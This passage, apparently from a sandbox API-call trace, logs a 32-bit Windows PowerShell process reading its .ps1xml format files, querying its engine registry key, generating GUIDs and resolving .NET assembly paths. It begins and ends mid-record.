"c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0144.238] GetLastError () returned 0xcb [0144.238] SetErrorMode (uMode=0x1) returned 0x1 [0144.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.239] GetLastError () returned 0xcb [0144.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.294] GetLastError () returned 0xcb [0144.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.295] GetLastError () returned 0xcb [0144.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.295] GetLastError () returned 0xcb [0144.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.296] GetLastError () returned 0xcb [0144.296] SetErrorMode (uMode=0x1) returned 0x1 [0144.296] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1ec [0144.296] GetLastError () returned 0x0 [0144.297] GetFileType (hFile=0x1ec) returned 0x1 [0144.297] SetErrorMode (uMode=0x1) returned 0x1 [0144.297] GetFileType (hFile=0x1ec) returned 0x1 [0144.297] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.302] GetLastError () returned 0x0 [0144.317] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.317] GetLastError () returned 0x0 [0144.317] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.317] GetLastError () returned 0x0 [0144.317] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.317] GetLastError () returned 0x0 [0144.320] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.320] GetLastError () returned 0x0 [0144.320] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.320] GetLastError () returned 0x0 [0144.320] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x9e2, lpOverlapped=0x0) returned 1 [0144.320] GetLastError () returned 0x0 [0144.320] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3ce46, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3ce46*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0144.320] GetLastError () returned 0x0 [0144.321] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0144.321] GetLastError () returned 0x0 [0144.321] CloseHandle (hObject=0x1ec) returned 1 [0144.321] GetLastError () returned 0x0 [0144.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.321] GetLastError () returned 0x0 [0144.321] SetErrorMode (uMode=0x1) returned 0x1 [0144.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f4e980 | out: lpFileInformation=0x2f4e980*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0144.321] GetLastError () returned 0x0 [0144.321] SetErrorMode (uMode=0x1) returned 0x1 [0144.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.322] GetLastError () returned 0x0 [0144.322] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1ec) returned 0x0 [0144.322] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0144.322] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0144.323] RegCloseKey (hKey=0x1ec) returned 0x0 [0144.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.323] GetLastError () returned 0x0 [0144.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.323] GetLastError () returned 0x0 [0144.528] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xe9f828dc, Data2=0x8c5b, Data3=0x412d, Data4=([0]=0xac, [1]=0x8c, [2]=0x24, [3]=0x67, [4]=0xc0, [5]=0x38, [6]=0x80, [7]=0x77))) returned 0x0 [0144.600] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x6709430e, Data2=0xf12c, Data3=0x4f1d, Data4=([0]=0x96, [1]=0x78, [2]=0x12, [3]=0xb5, [4]=0x57, [5]=0xd2, [6]=0x3b, [7]=0xcd))) returned 0x0 [0144.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.602] GetLastError () returned 0x0 [0144.602] SetErrorMode (uMode=0x1) returned 0x1 [0144.602] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1ec [0144.602] GetLastError () returned 0x0 [0144.602] GetFileType (hFile=0x1ec) returned 0x1 [0144.602] SetErrorMode (uMode=0x1) returned 0x1 [0144.602] GetFileType (hFile=0x1ec) returned 0x1 [0144.602] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.603] GetLastError () returned 0x0 [0144.603] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.603] GetLastError () returned 0x0 [0144.603] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.603] GetLastError () returned 0x0 [0144.604] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.604] GetLastError () returned 0x0 [0144.604] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.604] GetLastError () returned 0x0 [0144.604] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0xfb2, lpOverlapped=0x0) returned 1 [0144.605] GetLastError () returned 0x0 [0144.605] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f613ba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f613ba*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0144.605] GetLastError () returned 0x0 [0144.605] ReadFile (in: hFile=0x1ec, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0144.605] GetLastError () returned 0x0 [0144.605] CloseHandle (hObject=0x1ec) returned 1 [0144.605] GetLastError () returned 0x0 [0144.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.605] GetLastError () returned 0x0 [0144.605] SetErrorMode (uMode=0x1) returned 0x1 [0144.605] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f824f8 | out: lpFileInformation=0x2f824f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0144.605] GetLastError () returned 0x0 [0144.605] SetErrorMode (uMode=0x1) returned 0x1 [0144.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.605] GetLastError () returned 0x0 [0144.606] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1ec) returned 0x0 [0144.606] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0144.606] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0144.606] RegCloseKey (hKey=0x1ec) returned 0x0 [0144.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.606] GetLastError () returned 0x0 [0144.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.606] GetLastError () returned 0x0 [0144.608] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x5223f4cc, Data2=0xd493, Data3=0x43e8, Data4=([0]=0xb4, [1]=0xfc, [2]=0xd2, [3]=0xf2, [4]=0x4a, [5]=0xf4, [6]=0xc3, [7]=0xc3))) returned 0x0 [0144.615] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xfbc58e1e, Data2=0xfd1d, Data3=0x4cde, Data4=([0]=0x90, [1]=0xaa, [2]=0xd4, [3]=0x14, [4]=0xf9, [5]=0x90, [6]=0xee, [7]=0x5d))) returned 0x0 [0144.650] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xbdeb1fc5, Data2=0x418e, Data3=0x4437, Data4=([0]=0x9d, [1]=0x5b, [2]=0x90, [3]=0x7f, [4]=0x33, [5]=0x84, [6]=0x4b, [7]=0x58))) returned 0x0 [0144.650] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x7b7d0cca, Data2=0xe837, Data3=0x46c7, Data4=([0]=0xb6, [1]=0x11, [2]=0xfe, [3]=0x97, [4]=0x55, [5]=0xef, [6]=0xf9, [7]=0xd0))) returned 0x0 [0144.650] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa986ec82, Data2=0xb4d2, Data3=0x4a72, Data4=([0]=0x80, [1]=0x20, [2]=0x88, [3]=0x74, [4]=0x7d, [5]=0x7a, [6]=0x1a, [7]=0x3d))) returned 0x0 [0144.650] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x29e1c878, Data2=0x32c7, Data3=0x4fcf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x6, [3]=0x11, [4]=0x1a, [5]=0x8c, [6]=0x4f, [7]=0x62))) returned 0x0 [0144.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.650] GetLastError () returned 0x0 [0144.650] SetErrorMode (uMode=0x1) returned 0x1 [0144.650] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1ec [0144.651] GetLastError () returned 0x0 [0144.651] GetFileType (hFile=0x1ec) returned 0x1 [0144.651] SetErrorMode (uMode=0x1) returned 0x1 [0144.651] GetFileType (hFile=0x1ec) returned 0x1 [0144.651] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.688] GetLastError () returned 0x0 [0144.689] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.689] GetLastError () returned 0x0 [0144.690] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.690] GetLastError () returned 0x0 [0144.690] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.690] GetLastError () returned 0x0 [0144.691] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0xaca, lpOverlapped=0x0) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa150a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa150a*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0144.691] GetLastError () returned 0x0 [0144.691] ReadFile (in: hFile=0x1ec, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0144.691] GetLastError () returned 0x0 [0144.692] CloseHandle (hObject=0x1ec) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.692] GetLastError () returned 0x0 [0144.692] SetErrorMode (uMode=0x1) returned 0x1 [0144.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fc2e9c | out: lpFileInformation=0x2fc2e9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0144.692] GetLastError () returned 0x0 [0144.692] SetErrorMode (uMode=0x1) returned 0x1 [0144.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.692] GetLastError () returned 0x0 [0144.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1ec) returned 0x0 [0144.693] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0144.693] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0144.693] RegCloseKey (hKey=0x1ec) returned 0x0 [0144.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.693] GetLastError () returned 0x0 [0144.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.693] GetLastError () returned 0x0 [0144.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0144.713] GetLastError () returned 0x0 [0144.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0144.715] GetLastError () returned 0x57 [0144.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0144.733] GetLastError () returned 0x57 [0144.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0144.740] GetLastError () returned 0x57 [0144.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0144.859] GetLastError () returned 0x57 [0144.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24dab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0144.867] GetLastError () returned 0x57 [0144.896] GetFullPathNameW (in: 